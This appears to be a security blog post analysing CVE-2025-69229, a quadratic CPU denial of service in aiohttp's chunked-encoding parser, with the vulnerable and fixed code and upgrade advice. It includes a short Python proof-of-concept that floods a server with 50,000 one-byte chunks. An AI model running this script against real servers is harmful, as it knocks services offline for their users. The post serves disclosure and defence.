Death by a Thousand Chunks: The aiohttp O(N^2) DoS
Jan 6, 2026·6 min read
Executive Summary (TL;DR)
aiohttp used a standard Python list to track HTTP chunk offsets, using `pop(0)` to retrieve them. Since `pop(0)` is an O(N) operation, processing a request with N chunks resulted in O(N^2) complexity. An attacker sending a stream of 1-byte chunks can monopolize the CPU, blocking the event loop and denying service to all other clients.
A high-impact Denial of Service vulnerability in the aiohttp Python library caused by algorithmic complexity in handling HTTP chunked transfer encoding. By flooding the server with thousands of tiny chunks, an attacker can trigger quadratic CPU consumption, effectively freezing the asynchronous event loop.
The Hook: Async Dreams vs. Synchronous Nightmares
We love aiohttp. It’s the backbone of modern Python microservices, promising high concurrency through the magic of the asyncio event loop. The deal we make with asyncio is simple: you can handle thousands of connections, as long as you never block the loop.
But here’s the thing about that deal: it relies on trust. It trusts that your code (and your library's code) won't spend an eternity shifting bits around in memory while other connections are waiting for their turn. CVE-2025-69229 is a betrayal of that trust.
It turns out that handling HTTP chunked transfer encoding—a standard feature for streaming data—was implemented with a naive data structure that turns a simple file upload into a computational black hole. If you run aiohttp in production, a single malicious client with a slow internet connection (or a script pretending to have one) can bring your shiny async worker to a complete halt.
The Flaw: A List of Problems
The root cause here is a classic Computer Science 101 failure: choosing the wrong data structure for the job. Specifically, aiohttp was using a standard Python list to store the offsets of incoming chunk boundaries in self._http_chunk_splits.
When you upload data using Transfer-Encoding: chunked, the server parses the stream and marks where each chunk ends. The parser then consumes these offsets one by one to reconstruct the body. In the vulnerable code, this consumption happened via pop(0).
Here lies the dragon. In Python, a list is implemented as a dynamic array. When you call pop(0), you remove the first element. To maintain the array's integrity, Python must shift every single remaining element one slot to the left. This is an O(N) operation.
Now, imagine an attacker sends a payload split into 50,000 chunks (N=50,000). For the first chunk, the server shifts 49,999 items. For the second, 49,998 items. By the end, you've performed roughly (N^2)/2 operations. That's 1.25 billion memory shifts for a trivial amount of data. Your CPU isn't serving requests anymore; it's just shuffling pointers.
The Code: The Smoking Gun
Let's look at the diff. It is painfully simple, yet it saves the day. The fix involves two main parts: swapping the data structure and implementing backpressure.
Part 1: The Algo Fix
The maintainers swapped the list for a collections.deque (double-ended queue). A deque is implemented as a doubly-linked list of blocks. popleft() on a deque is an O(1) operation. It doesn't care how many items are in the queue.
# VULNERABLE CODE (aiohttp/streams.py)
self._http_chunk_splits = [] # Just a list
...
# Inside the read loop
pos = self._http_chunk_splits.pop(0) # O(N) - The killer line
# FIXED CODE
from collections import deque
self._http_chunk_splits = deque()
...
pos = self._http_chunk_splits.popleft() # O(1) - sanity restoredPart 2: The Flow Control
Even with O(1) popping, storing millions of chunk offsets is a memory hazard. The patch adds "watermarks" to pause reading from the socket if the metadata buffer gets too full. This is crucial: before this, aiohttp only throttled based on byte size, not chunk count.
# Added in the fix
if len(self._http_chunk_splits) > self._high_water_chunks:
if not self._protocol._reading_paused:
self._protocol.pause_reading()The Exploit: Death by 1000 Bytes
Exploiting this is trivially easy. We don't need to bypass ASLR or craft ROP chains. We just need to be annoying. We will open a socket, declare we are sending chunked data, and then send thousands of chunks containing a single byte (or even zero data, just metadata overhead).
Here is a conceptual Python PoC that breaks a vulnerable server:
import socket
import time
target_host = "127.0.0.1"
target_port = 8080
# Connect to the vulnerable aiohttp server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_host, target_port))
# Start a POST request with chunked encoding
s.send(b"POST / HTTP/1.1\r\n")
s.send(b"Host: target\r\n")
s.send(b"Transfer-Encoding: chunked\r\n\r\n")
# Send 50,000 tiny chunks
# Each '1\r\nA\r\n' adds an entry to the vulnerable list
for i in range(50000):
s.send(b"1\r\nA\r\n")
# No sleep needed usually, we want to flood the list
# Terminate the stream
s.send(b"0\r\n\r\n")
# At this point, when the server tries to read this body,
# it enters the O(N^2) loop and hangs.
print("Payload sent. Server should be struggling now.")When the server application calls await request.read(), it walks into the trap. The event loop blocks. If you have a health check endpoint on the same worker, it will time out.
The Impact: Why Should We Panic?
In a synchronous world (like classic Flask or Django with gunicorn workers), this would lock up one worker process. Annoying, but survivable if you have 20 workers.
In the asynchronous world of aiohttp, a single process often handles hundreds or thousands of concurrent connections. When the event loop blocks to process our malicious chunk list, it stops processing everything.
Heartbeats fail. Database callbacks aren't fired. Other legitimate users trying to load the homepage are left spinning. A single attacker can effectively DoS an entire instance with very little bandwidth. It is an asymmetric attack: low cost for the attacker, high cost for the defender.
The Fix: Remediation
The fix is straightforward: upgrade aiohttp. The maintainers released version 3.13.3 which includes both the deque optimization and the chunk-count throttling.
Remediation Steps:
- Update your requirements file:
aiohttp>=3.13.3. - Rebuild your container images.
- Deploy.
Defense in Depth:
If you cannot upgrade immediately, consider placing a reverse proxy like Nginx in front of your Python application. Nginx is generally much more robust against chunked encoding abuse. You can configure Nginx to buffer the entire request body before passing it to the upstream aiohttp server (proxy_request_buffering on;, which is usually the default). This collapses the chunks into a standard Content-Length request (or larger chunks), neutralizing the attack before it hits Python.
Fix Analysis (2)
Technical Appendix
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:UAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
aiohttp aio-libs | <= 3.13.2 | 3.13.3 |
| Attribute | Detail |
|---|---|
| CWE | CWE-770 (Allocation of Resources Without Limits) |
| Attack Vector | Network |
| CVSS v4.0 | 6.6 (Medium) |
| Complexity | O(N^2) Quadratic |
| Impact | Denial of Service (Event Loop Block) |
| Status | Fixed in 3.13.3 |
MITRE ATT&CK Mapping
The software allocates resources (memory, CPU) without limits or throttling based on the quantity of input metadata, allowing an attacker to cause resource exhaustion.
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.